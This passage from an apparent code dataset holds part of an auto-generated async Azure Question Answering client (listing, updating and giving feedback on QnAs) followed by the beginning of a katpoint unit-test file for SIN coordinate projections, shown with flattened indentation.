top: Optional[int] = None,
skip: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable[JSON]:
"""Gets all the QnAs of a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/get-qnas
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:keyword source: Source of the QnA. Default value is None.
:paramtype source: str
:keyword top: The maximum number of resources to return from the collection. Default value is
None.
:paramtype top: int
:keyword skip: An offset into the collection of the first resource to be returned. Default
value is None.
:paramtype skip: int
:return: An iterator-like instance of JSON object
:rtype: ~azure.core.async_paging.AsyncItemPaged[JSON]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200
response == {
"activeLearningSuggestions": [
{
"clusterHead": "str", # Optional. Question chosen as the
head of suggested questions cluster by Active Learning clustering
algorithm.
"suggestedQuestions": [
{
"autoSuggestedCount": 0, # Optional. The
number of times the question was suggested automatically by the
Active Learning algorithm.
"question": "str", # Optional. Question
suggested by the Active Learning feature.
"userSuggestedCount": 0 # Optional. The
number of times the question was suggested explicitly by the
user.
}
]
}
],
"answer": "str", # Optional. Answer text.
"dialog": {
"isContextOnly": bool, # Optional. To mark if a prompt is relevant
only with a previous question or not. If true, do not include this QnA as
answer for queries without context; otherwise, ignores context and includes
this QnA in answers.
"prompts": [
{
"displayOrder": 0, # Optional. Index of the prompt.
It is used for ordering of the prompts.
"displayText": "str", # Optional. Text displayed to
represent a follow up question prompt.
"qna": {
"activeLearningSuggestions": [
{
"clusterHead": "str", #
Optional. Question chosen as the head of suggested
questions cluster by Active Learning clustering
algorithm.
"suggestedQuestions": [
{
"autoSuggestedCount": 0, # Optional. The number
of times the question was suggested automatically
by the Active Learning algorithm.
"question":
"str", # Optional. Question suggested by the
Active Learning feature.
"userSuggestedCount": 0 # Optional. The number
of times the question was suggested explicitly by
the user.
}
]
}
],
"answer": "str", # Optional. Answer text.
"dialog": ...,
"id": 0, # Optional. Unique ID for the QnA.
"metadata": {
"str": "str" # Optional. Metadata
associated with the answer, useful to categorize or filter
question answers.
},
"questions": [
"str" # Optional. List of questions
associated with the answer.
],
"source": "str" # Optional. Source from
which QnA was indexed e.g.
https://docs.microsoft.com/en-us/azure/cognitive-services/QnAMaker/FAQs
.
},
"qnaId": 0 # Optional. ID of the QnA corresponding
to the prompt.
}
]
},
"id": 0, # Optional. Unique ID for the QnA.
"lastUpdatedDateTime": "2020-02-20 00:00:00", # Optional. Date-time when the
QnA was last updated.
"metadata": {
"str": "str" # Optional. Metadata associated with the answer, useful
to categorize or filter question answers.
},
"questions": [
"str" # Optional. List of questions associated with the answer.
],
"source": "str" # Optional. Source from which QnA was indexed e.g.
https://docs.microsoft.com/en-us/azure/cognitive-services/QnAMaker/FAQs .
}
"""
_headers = kwargs.pop("headers", {}) or {}
_params = kwargs.pop("params", {}) or {}
cls = kwargs.pop("cls", None) # type: ClsType[JSON]
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_qnas_request(
project_name=project_name,
source=source,
top=top,
skip=skip,
api_version=self._config.api_version,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
else:
# make call to next link with the client's api-version
_parsed_next_link = urlparse(next_link)
_next_request_params = case_insensitive_dict(parse_qs(_parsed_next_link.query))
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest("GET", urljoin(next_link, _parsed_next_link.path), params=_next_request_params)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
return request
async def extract_data(pipeline_response):
deserialized = pipeline_response.http_response.json()
list_of_elem = deserialized["value"]
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.get("nextLink", None), AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
return pipeline_response
return AsyncItemPaged(get_next, extract_data)
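    # Illustrative call pattern for the paging method above (a sketch, not part
    # of the generated client; `client` is assumed to be an authenticated
    # instance of this operations class and "my-project" a placeholder name):
    #
    #     async for qna in client.list_qnas(project_name="my-project", top=10):
    #         print(qna["id"], qna["answer"])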
async def _update_qnas_initial(
self, project_name: str, qnas: Union[List[JSON], IO], **kwargs: Any
) -> Optional[JSON]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = kwargs.pop("params", {}) or {}
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[Optional[JSON]]
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(qnas, (IO, bytes)):
_content = qnas
else:
_json = qnas
request = build_update_qnas_request(
project_name=project_name,
content_type=content_type,
api_version=self._config.api_version,
json=_json,
content=_content,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
response_headers = {}
if response.status_code == 200:
if response.content:
deserialized = response.json()
else:
deserialized = None
if response.status_code == 202:
response_headers["Operation-Location"] = self._deserialize(
"str", response.headers.get("Operation-Location")
)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
@overload
async def begin_update_qnas(
self, project_name: str, qnas: List[JSON], *, content_type: str = "application/json", **kwargs: Any
) -> AsyncLROPoller[AsyncIterable[JSON]]:
"""Updates the QnAs of a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/update-qnas
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param qnas: Update QnAs parameters of a project. Required.
:type qnas: list[JSON]
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncLROBasePolling. Pass in False
for this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns an iterator like instance of JSON object
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.core.async_paging.AsyncItemPaged[JSON]]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
qnas = [
{
"op": "str", # Update operation type for assets. Required. Known
values are: "add", "delete", and "replace".
"value": {
"activeLearningSuggestions": [
{
"clusterHead": "str", # Optional. Question
chosen as the head of suggested questions cluster by Active
Learning clustering algorithm.
"suggestedQuestions": [
{
"autoSuggestedCount": 0, #
Optional. The number of times the question was suggested
automatically by the Active Learning algorithm.
"question": "str", #
Optional. Question suggested by the Active Learning
feature.
"userSuggestedCount": 0 #
Optional. The number of times the question was suggested
explicitly by the user.
}
]
}
],
"answer": "str", # Optional. Answer text.
"dialog": {
"isContextOnly": bool, # Optional. To mark if a
prompt is relevant only with a previous question or not. If true, do
not include this QnA as answer for queries without context;
otherwise, ignores context and includes this QnA in answers.
"prompts": [
{
"displayOrder": 0, # Optional. Index
of the prompt. It is used for ordering of the prompts.
"displayText": "str", # Optional.
Text displayed to represent a follow up question prompt.
"qna": ...,
"qnaId": 0 # Optional. ID of the QnA
corresponding to the prompt.
}
]
},
"id": 0, # Optional. Unique ID for the QnA.
"metadata": {
"str": "str" # Optional. Metadata associated with
the answer, useful to categorize or filter question answers.
},
"questions": [
"str" # Optional. List of questions associated with
the answer.
],
"source": "str" # Optional. Source from which QnA was
indexed e.g.
https://docs.microsoft.com/en-us/azure/cognitive-services/QnAMaker/FAQs .
}
}
]
# response body for status code(s): 200, 202
response == {
"activeLearningSuggestions": [
{
"clusterHead": "str", # Optional. Question chosen as the
head of suggested questions cluster by Active Learning clustering
algorithm.
"suggestedQuestions": [
{
"autoSuggestedCount": 0, # Optional. The
number of times the question was suggested automatically by the
Active Learning algorithm.
"question": "str", # Optional. Question
suggested by the Active Learning feature.
"userSuggestedCount": 0 # Optional. The
number of times the question was suggested explicitly by the
user.
}
]
}
],
"answer": "str", # Optional. Answer text.
"dialog": {
"isContextOnly": bool, # Optional. To mark if a prompt is relevant
only with a previous question or not. If true, do not include this QnA as
answer for queries without context; otherwise, ignores context and includes
this QnA in answers.
"prompts": [
{
"displayOrder": 0, # Optional. Index of the prompt.
It is used for ordering of the prompts.
"displayText": "str", # Optional. Text displayed to
represent a follow up question prompt.
"qna": {
"activeLearningSuggestions": [
{
"clusterHead": "str", #
Optional. Question chosen as the head of suggested
questions cluster by Active Learning clustering
algorithm.
"suggestedQuestions": [
{
"autoSuggestedCount": 0, # Optional. The number
of times the question was suggested automatically
by the Active Learning algorithm.
"question":
"str", # Optional. Question suggested by the
Active Learning feature.
"userSuggestedCount": 0 # Optional. The number
of times the question was suggested explicitly by
the user.
}
]
}
],
"answer": "str", # Optional. Answer text.
"dialog": ...,
"id": 0, # Optional. Unique ID for the QnA.
"metadata": {
"str": "str" # Optional. Metadata
associated with the answer, useful to categorize or filter
question answers.
},
"questions": [
"str" # Optional. List of questions
associated with the answer.
],
"source": "str" # Optional. Source from
which QnA was indexed e.g.
https://docs.microsoft.com/en-us/azure/cognitive-services/QnAMaker/FAQs
.
},
"qnaId": 0 # Optional. ID of the QnA corresponding
to the prompt.
}
]
},
"id": 0, # Optional. Unique ID for the QnA.
"lastUpdatedDateTime": "2020-02-20 00:00:00", # Optional. Date-time when the
QnA was last updated.
"metadata": {
"str": "str" # Optional. Metadata associated with the answer, useful
to categorize or filter question answers.
},
"questions": [
"str" # Optional. List of questions associated with the answer.
],
"source": "str" # Optional. Source from which QnA was indexed e.g.
https://docs.microsoft.com/en-us/azure/cognitive-services/QnAMaker/FAQs .
}
"""
@overload
async def begin_update_qnas(
self, project_name: str, qnas: IO, *, content_type: str = "application/json", **kwargs: Any
) -> AsyncLROPoller[AsyncIterable[JSON]]:
"""Updates the QnAs of a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/update-qnas
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param qnas: Update QnAs parameters of a project. Required.
:type qnas: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncLROBasePolling. Pass in False
for this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns an iterator like instance of JSON object
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.core.async_paging.AsyncItemPaged[JSON]]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200, 202
response == {
"activeLearningSuggestions": [
{
"clusterHead": "str", # Optional. Question chosen as the
head of suggested questions cluster by Active Learning clustering
algorithm.
"suggestedQuestions": [
{
"autoSuggestedCount": 0, # Optional. The
number of times the question was suggested automatically by the
Active Learning algorithm.
"question": "str", # Optional. Question
suggested by the Active Learning feature.
"userSuggestedCount": 0 # Optional. The
number of times the question was suggested explicitly by the
user.
}
]
}
],
"answer": "str", # Optional. Answer text.
"dialog": {
"isContextOnly": bool, # Optional. To mark if a prompt is relevant
only with a previous question or not. If true, do not include this QnA as
answer for queries without context; otherwise, ignores context and includes
this QnA in answers.
"prompts": [
{
"displayOrder": 0, # Optional. Index of the prompt.
It is used for ordering of the prompts.
"displayText": "str", # Optional. Text displayed to
represent a follow up question prompt.
"qna": {
"activeLearningSuggestions": [
{
"clusterHead": "str", #
Optional. Question chosen as the head of suggested
questions cluster by Active Learning clustering
algorithm.
"suggestedQuestions": [
{
"autoSuggestedCount": 0, # Optional. The number
of times the question was suggested automatically
by the Active Learning algorithm.
"question":
"str", # Optional. Question suggested by the
Active Learning feature.
"userSuggestedCount": 0 # Optional. The number
of times the question was suggested explicitly by
the user.
}
]
}
],
"answer": "str", # Optional. Answer text.
"dialog": ...,
"id": 0, # Optional. Unique ID for the QnA.
"metadata": {
"str": "str" # Optional. Metadata
associated with the answer, useful to categorize or filter
question answers.
},
"questions": [
"str" # Optional. List of questions
associated with the answer.
],
"source": "str" # Optional. Source from
which QnA was indexed e.g.
https://docs.microsoft.com/en-us/azure/cognitive-services/QnAMaker/FAQs
.
},
"qnaId": 0 # Optional. ID of the QnA corresponding
to the prompt.
}
]
},
"id": 0, # Optional. Unique ID for the QnA.
"lastUpdatedDateTime": "2020-02-20 00:00:00", # Optional. Date-time when the
QnA was last updated.
"metadata": {
"str": "str" # Optional. Metadata associated with the answer, useful
to categorize or filter question answers.
},
"questions": [
"str" # Optional. List of questions associated with the answer.
],
"source": "str" # Optional. Source from which QnA was indexed e.g.
https://docs.microsoft.com/en-us/azure/cognitive-services/QnAMaker/FAQs .
}
"""
@distributed_trace_async
async def begin_update_qnas(
self, project_name: str, qnas: Union[List[JSON], IO], **kwargs: Any
) -> AsyncLROPoller[AsyncIterable[JSON]]:
"""Updates the QnAs of a project.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/update-qnas
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
        :param qnas: Update QnAs parameters of a project. Is either a list type or an IO type. Required.
:type qnas: list[JSON] or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncLROBasePolling. Pass in False
for this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns an iterator like instance of JSON object
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.core.async_paging.AsyncItemPaged[JSON]]
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# response body for status code(s): 200, 202
response == {
"activeLearningSuggestions": [
{
"clusterHead": "str", # Optional. Question chosen as the
head of suggested questions cluster by Active Learning clustering
algorithm.
"suggestedQuestions": [
{
"autoSuggestedCount": 0, # Optional. The
number of times the question was suggested automatically by the
Active Learning algorithm.
"question": "str", # Optional. Question
suggested by the Active Learning feature.
"userSuggestedCount": 0 # Optional. The
number of times the question was suggested explicitly by the
user.
}
]
}
],
"answer": "str", # Optional. Answer text.
"dialog": {
"isContextOnly": bool, # Optional. To mark if a prompt is relevant
only with a previous question or not. If true, do not include this QnA as
answer for queries without context; otherwise, ignores context and includes
this QnA in answers.
"prompts": [
{
"displayOrder": 0, # Optional. Index of the prompt.
It is used for ordering of the prompts.
"displayText": "str", # Optional. Text displayed to
represent a follow up question prompt.
"qna": {
"activeLearningSuggestions": [
{
"clusterHead": "str", #
Optional. Question chosen as the head of suggested
questions cluster by Active Learning clustering
algorithm.
"suggestedQuestions": [
{
"autoSuggestedCount": 0, # Optional. The number
of times the question was suggested automatically
by the Active Learning algorithm.
"question":
"str", # Optional. Question suggested by the
Active Learning feature.
"userSuggestedCount": 0 # Optional. The number
of times the question was suggested explicitly by
the user.
}
]
}
],
"answer": "str", # Optional. Answer text.
"dialog": ...,
"id": 0, # Optional. Unique ID for the QnA.
"metadata": {
"str": "str" # Optional. Metadata
associated with the answer, useful to categorize or filter
question answers.
},
"questions": [
"str" # Optional. List of questions
associated with the answer.
],
"source": "str" # Optional. Source from
which QnA was indexed e.g.
https://docs.microsoft.com/en-us/azure/cognitive-services/QnAMaker/FAQs
.
},
"qnaId": 0 # Optional. ID of the QnA corresponding
to the prompt.
}
]
},
"id": 0, # Optional. Unique ID for the QnA.
"lastUpdatedDateTime": "2020-02-20 00:00:00", # Optional. Date-time when the
QnA was last updated.
"metadata": {
"str": "str" # Optional. Metadata associated with the answer, useful
to categorize or filter question answers.
},
"questions": [
"str" # Optional. List of questions associated with the answer.
],
"source": "str" # Optional. Source from which QnA was indexed e.g.
https://docs.microsoft.com/en-us/azure/cognitive-services/QnAMaker/FAQs .
}
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = kwargs.pop("params", {}) or {}
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[JSON]
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(qnas, (IO, bytes)):
_content = qnas
else:
_json = qnas
def prepare_request(next_link=None):
if not next_link:
request = build_update_qnas_request(
project_name=project_name,
content_type=content_type,
api_version=self._config.api_version,
json=_json,
content=_content,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
else:
# make call to next link with the client's api-version
_parsed_next_link = urlparse(next_link)
_next_request_params = case_insensitive_dict(parse_qs(_parsed_next_link.query))
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest("GET", urljoin(next_link, _parsed_next_link.path), params=_next_request_params)
path_format_arguments = {
"Endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
return request
async def extract_data(pipeline_response):
deserialized = pipeline_response.http_response.json()
list_of_elem = deserialized["value"]
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.get("nextLink", None), AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
return pipeline_response
polling = kwargs.pop("polling", True) # type: Union[bool, AsyncPollingMethod]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = await self._update_qnas_initial( # type: ignore
project_name=project_name,
qnas=qnas,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
async def internal_get_next(next_link=None):
if next_link is None:
return pipeline_response
return await get_next(next_link)
return AsyncItemPaged(internal_get_next, extract_data)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method = cast(
AsyncPollingMethod,
AsyncLROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs),
) # type: AsyncPollingMethod
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
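    # Illustrative call pattern (a sketch, not part of the generated client;
    # `client` and the payload values below are placeholder assumptions):
    #
    #     poller = await client.begin_update_qnas(
    #         project_name="my-project",
    #         qnas=[{"op": "add", "value": {"answer": "...", "questions": ["..."]}}],
    #     )
    #     async for qna in await poller.result():
    #         print(qna["id"])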
@overload
async def add_feedback( # pylint: disable=inconsistent-return-statements
self, project_name: str, feedback: JSON, *, content_type: str = "application/json", **kwargs: Any
) -> None:
"""Update Active Learning feedback.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/add-feedback
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param feedback: Feedback for Active Learning. Required.
:type feedback: JSON
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:return: None
:rtype: None
:raises ~azure.core.exceptions.HttpResponseError:
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
feedback = {
"records": [
{
"qnaId": 0, # Optional. Unique ID of the QnA.
"userId": "str", # Optional. Unique identifier of the user.
"userQuestion": "str" # Optional. User suggested question
for the QnA.
}
]
}
"""
@overload
async def add_feedback( # pylint: disable=inconsistent-return-statements
self, project_name: str, feedback: IO, *, content_type: str = "application/json", **kwargs: Any
) -> None:
"""Update Active Learning feedback.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/add-feedback
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
:param feedback: Feedback for Active Learning. Required.
:type feedback: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:return: None
:rtype: None
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def add_feedback( # pylint: disable=inconsistent-return-statements
self, project_name: str, feedback: Union[JSON, IO], **kwargs: Any
) -> None:
"""Update Active Learning feedback.
See
https://learn.microsoft.com/rest/api/cognitiveservices/questionanswering/question-answering-projects/add-feedback
for more information.
:param project_name: The name of the project to use. Required.
:type project_name: str
        :param feedback: Feedback for Active Learning. Is either a model type or an IO type. Required.
:type feedback: JSON or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:return: None
:rtype: None
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = kwargs.pop("params", {}) or {}
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[None]
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(feedback, (IO, bytes)):
_content = feedback
else:
_json = feedback
request = build_add_feedback_request(
project_name=project_name,
content_type=content_type,
api_version=self._config.api_version,
json=_json,
content=_content,
headers=_headers,
params=_params,
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
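    # Illustrative call pattern (a sketch; `client` is assumed to be an
    # authenticated instance of this operations class):
    #
    #     await client.add_feedback(
    #         project_name="my-project",
    #         feedback={"records": [{"qnaId": 1, "userId": "u1",
    #                                "userQuestion": "sample question"}]},
    #     )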
| [
"[email protected]"
] | |
eb0c32a682abc73083d3f4107b867774b5972b20 | 67e3388ed0e1154dc0ceb189c83a8521eba79fae | /katpoint/test/test_projection.py | 032e6ecdfb607b5818f3fbdd90f050914c002c10 | [
"BSD-3-Clause"
] | permissive | astrojhgu/katpoint | 3dd0f946d76859280ade5f55c85f08538cc24462 | b0fa342c2f6dcebe7474cc405d5fbdb4f3f295bc | refs/heads/master | 2020-12-31T00:40:42.452856 | 2017-01-31T10:30:25 | 2017-01-31T10:30:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32,066 | py | ################################################################################
# Copyright (c) 2009-2016, National Research Foundation (Square Kilometre Array)
#
# Licensed under the BSD 3-Clause License (the "License"); you may not use
# this file except in compliance with the License. You may obtain a copy
# of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
"""Tests for the projection module."""
# pylint: disable-msg=C0103,W0212
import unittest
import numpy as np
import katpoint
try:
from .aips_projection import newpos, dircos
found_aips = True
except ImportError:
found_aips = False
def skip(reason=''):
"""Use nose to skip a test."""
try:
import nose
raise nose.SkipTest(reason)
except ImportError:
pass
def assert_angles_almost_equal(x, y, decimal):
    """Assert that angle arrays `x` and `y` agree to `decimal` places, modulo 2*pi."""
    def primary_angle(delta):
        return delta - np.round(delta / (2.0 * np.pi)) * 2.0 * np.pi
    np.testing.assert_almost_equal(primary_angle(x - y), np.zeros(np.shape(x)), decimal=decimal)
class TestProjectionSIN(unittest.TestCase):
"""Test orthographic projection."""
def setUp(self):
self.plane_to_sphere = katpoint.plane_to_sphere['SIN']
self.sphere_to_plane = katpoint.sphere_to_plane['SIN']
N = 100
max_theta = np.pi / 2.0
self.az0 = np.pi * (2.0 * np.random.rand(N) - 1.0)
# Keep away from poles (leave them as corner cases)
self.el0 = 0.999 * np.pi * (np.random.rand(N) - 0.5)
# (x, y) points within unit circle
theta = max_theta * np.random.rand(N)
phi = 2 * np.pi * np.random.rand(N)
self.x = np.sin(theta) * np.cos(phi)
self.y = np.sin(theta) * np.sin(phi)
def test_random_closure(self):
"""SIN projection: do random projections and check closure."""
az, el = self.plane_to_sphere(self.az0, self.el0, self.x, self.y)
xx, yy = self.sphere_to_plane(self.az0, self.el0, az, el)
aa, ee = self.plane_to_sphere(self.az0, self.el0, xx, yy)
np.testing.assert_almost_equal(self.x, xx, decimal=10)
np.testing.assert_almost_equal(self.y, yy, decimal=10)
assert_angles_almost_equal(az, aa, decimal=10)
assert_angles_almost_equal(el, ee, decimal=10)
def test_aips_compatibility(self):
"""SIN projection: compare with original AIPS routine."""
if not found_aips:
skip("AIPS projection module not found")
return
az, el = self.plane_to_sphere(self.az0, self.el0, self.x, self.y)
xx, yy = self.sphere_to_plane(self.az0, self.el0, az, el)
az_aips, el_aips = np.zeros(az.shape), np.zeros(el.shape)
x_aips, y_aips = np.zeros(xx.shape), np.zeros(yy.shape)
        for n in range(len(az)):
az_aips[n], el_aips[n], ierr = \
newpos(2, self.az0[n], self.el0[n], self.x[n], self.y[n])
x_aips[n], y_aips[n], ierr = \
dircos(2, self.az0[n], self.el0[n], az[n], el[n])
self.assertEqual(ierr, 0)
assert_angles_almost_equal(az, az_aips, decimal=9)
assert_angles_almost_equal(el, el_aips, decimal=9)
np.testing.assert_almost_equal(xx, x_aips, decimal=9)
np.testing.assert_almost_equal(yy, y_aips, decimal=9)
def test_corner_cases(self):
"""SIN projection: test special corner cases."""
# SPHERE TO PLANE
# Origin
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, 0.0))
np.testing.assert_almost_equal(xy, [0.0, 0.0], decimal=12)
# Points 90 degrees from reference point on sphere
xy = np.array(self.sphere_to_plane(0.0, 0.0, np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [1.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, -np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [-1.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, np.pi / 2.0))
np.testing.assert_almost_equal(xy, [0.0, 1.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, -np.pi / 2.0))
np.testing.assert_almost_equal(xy, [0.0, -1.0], decimal=12)
# Reference point at pole on sphere
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, 0.0, 0.0))
np.testing.assert_almost_equal(xy, [0.0, -1.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, np.pi, 1e-8))
np.testing.assert_almost_equal(xy, [0.0, 1.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [1.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, -np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [-1.0, 0.0], decimal=12)
# Points outside allowed domain on sphere
self.assertRaises(ValueError, self.sphere_to_plane, 0.0, 0.0, np.pi, 0.0)
self.assertRaises(ValueError, self.sphere_to_plane, 0.0, 0.0, 0.0, np.pi)
# PLANE TO SPHERE
# Origin
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, 0.0))
assert_angles_almost_equal(ae, [0.0, 0.0], decimal=12)
# Points on unit circle in plane
ae = np.array(self.plane_to_sphere(0.0, 0.0, 1.0, 0.0))
assert_angles_almost_equal(ae, [np.pi / 2.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, -1.0, 0.0))
